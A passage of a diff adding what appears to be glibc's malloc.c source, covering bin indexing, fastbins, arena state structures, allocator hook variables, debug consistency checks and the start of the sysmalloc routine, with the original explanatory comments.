+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+};
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (p) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
